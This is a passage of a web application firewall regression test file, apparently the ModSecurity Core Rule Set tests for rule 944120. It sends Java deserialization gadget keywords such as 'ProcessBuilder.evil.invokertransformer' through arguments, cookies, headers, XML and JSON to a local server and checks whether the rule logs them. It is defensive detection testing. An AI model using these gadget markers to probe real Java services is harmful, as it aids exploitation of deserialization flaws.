"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.invokertransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-69 + desc: "Argument name includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.invokertransformer=test" + output: + log_contains: "id \"944120\"" + - test_title: 944120-70 + desc: "Cookie test includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.invokertransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-71 + desc: "Cookie name includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.invokertransformer=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-72 + desc: "Request header test includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.invokertransformer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-73 + desc: "XML element includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-74 + desc: "XML attribute name includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-75 + desc: "XML attribute value includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-76 + desc: "XML element value includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.invokertransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-77 + desc: "Nested XML element value includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.invokertransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-78 + desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.invokertransformer" + output: + log_contains: "id \"944120\"" + - test_title: 944120-79 + desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.invokertransformer\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-80 + desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.invokertransformer\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-81 + desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.invokertransformer": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-82 + desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.invokertransformer": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-83 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.invokertransformer + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-84 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.invokertransformer + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-85 + desc: "Argument test includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.prototypeclonefactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-86 + desc: "Argument name includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeclonefactory=test" + output: + log_contains: "id \"944120\"" + - test_title: 944120-87 + desc: "Cookie test includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.prototypeclonefactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-88 + desc: "Cookie name includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.prototypeclonefactory=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-89 + desc: "Request header test includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.prototypeclonefactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-90 + desc: "XML element includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-91 + desc: "XML attribute name includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-92 + desc: "XML attribute value includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-93 + desc: "XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeclonefactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-94 + desc: "Nested XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeclonefactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-95 + desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.prototypeclonefactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-96 + desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.prototypeclonefactory\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-97 + desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.prototypeclonefactory\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-98 + desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.prototypeclonefactory": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-99 + desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.prototypeclonefactory": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-100 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.prototypeclonefactory + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-101 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.prototypeclonefactory + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-102 + desc: "Argument test includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.prototypeserializationfactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-103 + desc: "Argument name includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeserializationfactory=test" + output: + log_contains: "id \"944120\"" + - test_title: 944120-104 + desc: "Cookie test includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.prototypeserializationfactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-105 + desc: "Cookie name includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.prototypeserializationfactory=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-106 + desc: "Request header test includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.prototypeserializationfactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-107 + desc: "XML element includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-108 + desc: "XML attribute name includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-109 + desc: "XML attribute value includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-110 + desc: "XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + 